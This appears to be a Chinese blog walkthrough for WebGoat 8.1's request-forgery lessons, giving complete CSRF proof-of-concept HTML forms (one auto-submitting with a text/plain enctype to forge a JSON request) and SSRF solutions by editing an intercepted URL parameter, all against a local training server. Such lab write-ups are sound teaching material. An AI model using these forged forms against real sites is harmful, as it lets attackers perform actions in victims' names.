一、Cross-Site Request Forgeries

1.Basic Get CSRF Exercise

根据题目提示说有隐藏表单，找到代码，右击form标签，复制->整个html

黏贴到编辑器上面并且补全html代码和action指定的url，保存后修改后缀为html

<html>
<body>
<form accept-charset="UNKNOWN" id="basic-csrf-get" method="POST" name="form1" target="_blank" successcallback="" action="http://192.168.3.88:8080/WebGoat/csrf/basic-get-flag"><input name="csrf" type="hidden" value="false"><input type="submit" name="submit"></form>
</body>
</html>

我这里为了方便没有用http，直接打开编写好的html文件提交，获得flag

2.Post a review on someone else’s behalf

这题和上一题的步骤也差不多

黏贴到编辑器上补齐，后改后缀名

<html>
<body>
<form class="attack-form" accept-charset="UNKNOWN" id="csrf-review" method="POST" name="review-form" successcallback="" action="http://192.168.3.88:8080/WebGoat/csrf/review"><input class="form-control" id="reviewText" name="reviewText" placeholder="a" type="text"><input class="form-control" id="reviewStars" name="stars" type="text"><input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9"><input type="submit" name="submit" value="Submit review"></form>
</body>
</html>

打开后输入，提交。回到webgoat刷新一下，已经有新的评价出现

3.CSRF and content-type

这一题根据题目给出的提交表单进行构造html来提交表单。

而且提交的格式是xml，这里涉及到编码转化的问题，不过题目里面的here跳转的页面已经很好的帮我们解决这个问题，也就是添加一个属性

ENCTYPE="text/plain"

构造的html代码

<html><script>window.onload = function() {document.getElementById("submit").click();}</script>   <body>                            <form class="attack-form" accept-charset="UNKNOWN" id="csrf-feedback" method="POST" preparedata="feedback" action="http://192.168.3.88:8080/WebGoat/csrf/feedback/message" contenttype="application/json" ENCTYPE="text/plain"><input type="hidden" name='{"name": "WebGoat","email":"webgoat@webgoat.org","content":"WebGoat is the best!!' value='"}'><input id="submit" type="submit" value="Submit request" style="display:none"/></form></body>
</html>

二、Server-Side Request Forgery

1.Change the URL to display Jerry

设置代理抓包

url值里面的tom改成jerry，放包。即可过关

2.Change the URL to display the Interface Configuration with ifconfig.pro

让我们改成使用ifconfig.pro接口，我们直接访问ifconfig.pro看看这个接口的整个url。有url就简单了

直接抓包改url的值就可以了

也可以直接在浏览器上面该value值提交

WebGoatV8.1(A8 2013Request Forgery)详细过关教程相关推荐

WebGoatV8.1(A1Injection)详细过关教程
一.SQL Injection (intro) 1.What is SQL? 题目让我们查找Bob Franco的部门基本的sql的查询语句:select 查询的字段 from 表名 where 筛 ...
WebGoatV8.1(A3-A5)详细过关教程
一.Insecure Login 打开代理,点击login,发现登陆的账号和密码没加密,提交可过关. 二.xxe 1.Let's try 设置代理进行抓包,发现我们评论的内容是在用xml进行传递这时候 ...
WebGoatV8.1(challenges)详细过关教程
一.Admin lost password 设置代理继续抓包,刷新题目本页面.抓取url路径为/WebGoat/challenge/logo的包,重放在回应包里面搜索admin找到账号和密码登录拿到 ...
Docker02 狂神Docker视频学习笔记：【狂神说Java 哔哩哔哩】Docker最新超详细版教程通俗易懂
目录 0. 视频源 0. 学习网址基础篇 1. Docker概述 1.1 Docker为什么出现? 1.2 Docker历史 1.3 Docker能干什么 2. Docker安装 2.1 Docke ...
SSM框架——详细整合教程（Spring+SpringMVC+MyBatis）
登录 | 注册收藏成功确定收藏失败,请重新收藏确定查看所有私信查看所有通知暂没有新通知想要绕过微信小程序开发中的坑吗?不妨来听这个,今晚8点,1小时帮你搞定! 14小时以前 CSDN日报 ...
mysql为什么每天0点就装东西_MySQL的详细安装教程
1.安装之前需要注意的几点建议不要安装最新版本,一般找mysql5.0系列版本即可: mysq1官网有.zip和.msi两种安装形式: zip是压缩包,直接解压缩以后使用的,需要自己配置各种东西:m ...
mysql windows 管道连接,科技常识：Windows Server 2016 MySQL数据库安装配置详细安装教程...
今天小编跟大家讲解下有关Windows Server 2016 MySQL数据库安装配置详细安装教程 ,相信小伙伴们对这个话题应该也很关注吧,小编也收集到了有关Windows Server 2016 ...
python安装了运行不了_python详细安装教程
本章开始,我们将详细介绍Python编程环境的搭建,工欲善其事必先利其器,所以我们这里先介绍python详细安装教程.由于Python是跨平台的,他可以运行在Windows.Linux.Mac等系统上 ...
truffle详细使用教程
详细使用教程选择以太坊客户端编译智能合约运行迁移测试智能合约用 JavaScript 编写测试脚本编写 Solidity 测试脚本与智能合约交互使用 EthPM 包管理工具调试智能合 ...

WebGoatV8.1(A8 2013Request Forgery)详细过关教程